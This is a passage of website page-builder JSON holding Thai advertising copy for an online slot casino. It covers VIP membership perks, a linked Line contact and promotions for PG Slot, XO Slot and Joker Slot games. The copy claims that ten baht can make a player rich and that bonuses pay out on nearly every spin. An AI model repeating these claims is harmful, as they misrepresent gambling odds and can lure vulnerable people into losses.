400;\\\">\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e19\\u0e2d\\u0e32\\u0e08\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e32\\u0e01 \\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e01\\u0e47\\u0e08\\u0e30\\u0e2a\\u0e39\\u0e07\\u0e02\\u0e36\\u0e49\\u0e19\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e30\\u0e41\\u0e19\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e17\\u0e38\\u0e01\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e08\\u0e49\\u0e32\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e17\\u0e35\\u0e48\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e15\\u0e31\\u0e27 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e23\\u0e32\\u0e22\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e2a\\u0e38\\u0e14\\u0e40\\u0e2d\\u0e47\\u0e01\\u0e0b\\u0e4c\\u0e04\\u0e25\\u0e39\\u0e0b\\u0e35\\u0e1f\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e41\\u0e0a\\u0e17\\u0e2a\\u0e14\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a <strong><a href=\\\"http:\\/\\/mgbline.com\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Line Official<\\/a><\\/strong> \\u0e41\\u0e25\\u0e30\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e41\\u0e2d\\u0e1b\\u0e1e\\u0e25\\u0e34\\u0e40\\u0e04\\u0e0a\\u0e31\\u0e19 \\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e15\\u0e2d\\u0e1a\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e27\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e33\\u0e27\\u0e48\\u0e32\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e17\\u0e34\\u0e49\\u0e07\\u0e44\\u0e27\\u0e49 \\u0e41\\u0e21\\u0e49\\u0e41\\u0e15\\u0e48\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e04\\u0e38\\u0e49\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e47\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e07\\u0e27\\u0e25 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e41\\u0e19\\u0e30\\u0e19\\u0e33\\u0e17\\u0e38\\u0e01\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e07\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 3 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e19\\u0e48\\u0e32\\u0e25\\u0e2d\\u0e07 \\u0e01\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e04\\u0e48\\u0e2a\\u0e34\\u0e1a\\u0e1a\\u0e32\\u0e17\\u0e01\\u0e47\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\n\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e23\\u0e32\\u0e22\\u0e44\\u0e14\\u0e49\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e22\\u0e32\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e17\\u0e35\\u0e48\\u0e04\\u0e34\\u0e14 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e32\\u0e21\\u0e35\\u0e1e\\u0e31\\u0e19\\u0e18\\u0e21\\u0e34\\u0e15\\u0e23\\u0e17\\u0e35\\u0e48\\u0e08\\u0e30\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e48\\u0e32\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e40\\u0e01\\u0e21\\u0e15\\u0e48\\u0e32\\u0e07 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e19\\u0e33\\u0e40\\u0e2a\\u0e19\\u0e2d\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e07\\u0e34\\u0e19\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e14\\u0e49\\u0e27\\u0e22 \\u0e42\\u0e14\\u0e22\\u0e21\\u0e35 3 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e35\\u0e48\\u0e19\\u0e48\\u0e32\\u0e25\\u0e38\\u0e49\\u0e19\\u0e14\\u0e31\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b\\u0e19\\u0e35\\u0e49 <\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #960c0a;\\\"><b>PG Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e43\\u0e04\\u0e23 \\u0e46 \\u0e01\\u0e47\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e22\\u0e01\\u0e43\\u0e2b\\u0e49 pg Slot \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e27\\u0e22 \\u0e40\\u0e1e\\u0e25\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e01\\u0e2d\\u0e1a\\u0e40\\u0e23\\u0e49\\u0e32\\u0e43\\u0e08 \\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e40\\u0e01\\u0e21\\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e23\\u0e32\\u0e22\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e35\\u0e22\\u0e14\\u0e25\\u0e36\\u0e01\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e27\\u0e32\\u0e07\\u0e01\\u0e25\\u0e22\\u0e38\\u0e17\\u0e18\\u0e4c\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07 pg Slot \\u0e04\\u0e37\\u0e2d \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c \\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c \\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e14\\u0e32\\u0e27\\u0e19\\u0e4c\\u0e42\\u0e2b\\u0e25\\u0e14\\u0e41\\u0e2d\\u0e1b\\u0e1e\\u0e25\\u0e34\\u0e40\\u0e04\\u0e0a\\u0e31\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e17\\u0e38\\u0e01\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19 \\u0e40\\u0e0a\\u0e48\\u0e19 Mahjong Ways, Lucky Neko, \\u0e2b\\u0e23\\u0e37\\u0e2d Treasures of Aztec \\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e31\\u0e19\\u0e15\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2e\\u0e2d\\u0e15\\u0e17\\u0e38\\u0e01\\u0e07\\u0e27\\u0e14 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e17\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e41\\u0e19\\u0e27\\u0e40\\u0e01\\u0e21\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e21\\u0e34\\u0e19\\u0e34\\u0e21\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19 \\u0e46 \\u0e23\\u0e31\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e27\\u0e48\\u0e32 pg Slot \\u0e04\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e15\\u0e34\\u0e14\\u0e43\\u0e08\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e41\\u0e23\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #960c0a;\\\"><b>XO Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e2d\\u0e35\\u0e01\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e15\\u0e33\\u0e19\\u0e32\\u0e19\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e2d\\u0e40\\u0e01\\u0e21\\u0e23\\u0e38\\u0e48\\u0e19\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e22\\u0e31\\u0e07\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e44\\u0e21\\u0e48\\u0e02\\u0e32\\u0e14\\u0e1b\\u0e32\\u0e01\\u0e01\\u0e47\\u0e04\\u0e37\\u0e2d XO Slot \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e38\\u0e14\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e07\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e21\\u0e32\\u0e19\\u0e32\\u0e19 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e22\\u0e31\\u0e07\\u0e04\\u0e07\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e02\\u0e2d\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e43\\u0e19\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e14\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e34\\u0e21\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e16\\u0e49\\u0e27\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e02\\u0e2d\\u0e07 XO Slot \\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e43\\u0e0a\\u0e49\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e44\\u0e14\\u0e49 \\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e17\\u0e35\\u0e48\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22\\u0e08\\u0e19\\u0e16\\u0e39\\u0e01\\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e27\\u0e48\\u0e32 \\u201c\\u0e04\\u0e48\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e0a\\u0e04\\u201d \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07 Roma, Supreme Caishen \\u0e2b\\u0e23\\u0e37\\u0e2d Lucky Panda \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e40\\u0e2d\\u0e01\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e20\\u0e32\\u0e1e \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07 \\u0e41\\u0e25\\u0e30\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e08\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e19\\u0e27\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e25\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e15\\u0e49\\u0e2d\\u0e07 XO Slot \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #960c0a;\\\"><b>Joker Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e38\\u0e14\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c \\u0e41\\u0e15\\u0e01\\u0e41\\u0e23\\u0e07 \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e38\\u0e01\\u0e41\\u0e19\\u0e27 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e25\\u0e32\\u0e14 \\u0e42\\u0e08\\u0e4a\\u0e01\\u0e40\\u0e01\\u0e2d\\u0e23\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d Joker Gaming \\u0e17\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e41\\u0e25\\u0e30\\u0e40\\u0e01\\u0e21\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 